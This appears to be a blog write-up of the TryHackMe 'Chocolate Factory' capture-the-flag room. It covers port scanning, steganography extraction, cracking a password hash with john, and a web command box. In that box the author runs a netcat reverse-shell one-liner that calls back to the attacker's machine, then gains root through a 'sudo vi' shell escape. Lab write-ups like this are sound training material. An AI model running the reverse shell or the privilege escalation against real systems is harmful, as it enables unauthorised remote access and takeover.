TryHackMe: Chocolate Factory [Easy/Free]

Enumeration

First thing is first, lets breakout rustscan and give the server poke.

╰─⠠⠵ rustscan -a 10.10.216.77 --ulimit 70000 -- -oA ChocolateFactory -v -sC -sV -A 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 70000.
Open 10.10.216.77:21
Open 10.10.216.77:22
Open 10.10.216.77:80
Open 10.10.216.77:101
Open 10.10.216.77:100
Open 10.10.216.77:102
Open 10.10.216.77:103
Open 10.10.216.77:104
Open 10.10.216.77:105
Open 10.10.216.77:107
Open 10.10.216.77:108
Open 10.10.216.77:109
Open 10.10.216.77:106
Open 10.10.216.77:110
Open 10.10.216.77:111
Open 10.10.216.77:112
Open 10.10.216.77:113
Open 10.10.216.77:114
Open 10.10.216.77:115
Open 10.10.216.77:117
Open 10.10.216.77:116
Open 10.10.216.77:119
Open 10.10.216.77:120
Open 10.10.216.77:121
Open 10.10.216.77:122
Open 10.10.216.77:118
Open 10.10.216.77:123
Open 10.10.216.77:124
Open 10.10.216.77:125

As we can see there a quite a few ports open.

Enter The Key You Found

From the above portscan we can see a number of different ports open, checking the first one we see ...

100/tcp open  newacct?    syn-ack
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   GetRequest, TLSSessionReq: 
|     "Welcome to chocolate room!! 
|     ___.---------------.
|     .'__'__'__'__'__,` . ____ ___ \r
|     _:\x20 |:. \x20 ___ \r
|     \'__'__'__'__'_`.__| `. \x20 ___ \r
|     \'__'__'__\x20__'_;-----------------`
|     \|______________________;________________|
|     small hint from Mr.Wonka : Look somewhere else, its not here! ;) 
|_    hope you wont drown Augustus"

Ok, it looks like we need to run through the ports. Eventually we find a port with a clue..

[redacted]/tcp open        syn-ack
| fingerprint-strings: 
|   
|_    http://[redacted]/[redacted] <- You will find the key here!!!

Going to this address we get a binary, using strings, cat, gdb or your favourite tool we can reverse engineer this binary to get the key

b'[redacted]'

What is Charlie's password?

Anonymous logon is enabled and there is a single file in there.

21/tcp  open  ftp         syn-ack vsftpd 3.0.3
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-rw-r--    1 1000     1000       208838 Sep 30 14:31 gum_room.jpg

Lets use ftp to download this file and take a look

chewy... Let's break out steghide and take a look at this file...

╰─⠠⠵ steghide extract -sf gum_room.jpg 
Enter passphrase: 
wrote extracted data to "b64.txt".

Using a blank password this writes out a base64 encode file to disk. Running this through base64 -d we get the output of what looks to be a linux /etc/passwd file. Lets run this through john and crack the password.

╰─⠠⠵ john passwd --wordlist=/usr/share/wordlists/rockyou.txt                      
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[redacted]           ([redacted])
1g 0:00:05:48 DONE (2021-01-17 23:11) 0.002869g/s 2824p/s 2824c/s 2824C/s codify..cn123
Use the "--show" option to display all of the cracked passwords reliably
Session completed

This gives us a username and password. Unfortunately this does not allow ssh access but does answer the question.

Change User To Charlie

If we visit the default website we see the below.

Remember we had a username/password we recovered from the stego file? Lets try that ....

Success we have logged into the website as Charlie.

Enter The User Flag

Once we have logged in we can see the below page which includes a command box.

Using our favourite reverse shell we can get a connection back ourselves.

command box

mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.5.198 4444 >/tmp/f

attack box

╰─○ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.9.5.198] from (UNKNOWN) [10.10.216.77] 57336
/bin/sh: 0: can't access tty; job control turned off
$

Under /home/charlie there is a user.txt but we can not read it.... There is however a ssh key pair in the folder. Copying the private key locally and setting the permissions to 600 we can use it to access the server as charlie and read user.txt.

Enter the root flag

Now that we have an ssh session as charlie we can look for privilege escalations to get to the root flag. First thing I try is sudo -l which will list commands that the user can run in an escalated way.

charlie@chocolate-factory:/home/charlie$ sudo -l
Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi

As seen above we can run vi without a password. If we look at GTFOBins we can see there is a sudo entry for vi

I however used a different method, I ran sudo vi and then entered [esc]:!/bin/bash -p . This dropped me into a root shell.

From here we can see there is no root.txt but there is a root.py which prompts for a key to decode a private message.

root@chocolate-factory:/root# python root.py 
Enter the key:  

Using the key from the first question ( including the b'' ) we can decode the message.

root@chocolate-factory:/root# python root.py 
Enter the key:  [redacted]
__   __               _               _   _                 _____ _          
\ \ / /__  _   _     / \   _ __ ___  | \ | | _____      __ |_   _| |__   ___ 
 \ V / _ \| | | |   / _ \ | '__/ _ \ |  \| |/ _ \ \ /\ / /   | | | '_ \ / _ \
  | | (_) | |_| |  / ___ \| | |  __/ | |\  | (_) \ V  V /    | | | | | |  __/
  |_|\___/ \__,_| /_/   \_\_|  \___| |_| \_|\___/ \_/\_/     |_| |_| |_|\___|
                                                                             
  ___                              ___   __  
 / _ \__      ___ __   ___ _ __   / _ \ / _| 
| | | \ \ /\ / / '_ \ / _ \ '__| | | | | |_  
| |_| |\ V  V /| | | |  __/ |    | |_| |  _| 
 \___/  \_/\_/ |_| |_|\___|_|     \___/|_|   
                                             

  ____ _                     _       _       
 / ___| |__   ___   ___ ___ | | __ _| |_ ___ 
| |   | '_ \ / _ \ / __/ _ \| |/ _` | __/ _ \
| |___| | | | (_) | (_| (_) | | (_| | ||  __/
 \____|_| |_|\___/ \___\___/|_|\__,_|\__\___|
                                             
 _____          _                    
|  ___|_ _  ___| |_ ___  _ __ _   _  
| |_ / _` |/ __| __/ _ \| '__| | | | 
|  _| (_| | (__| || (_) | |  | |_| | 
|_|  \__,_|\___|\__\___/|_|   \__, | 
                              |___/  

flag{[redacted]}

Boom, another fun room done....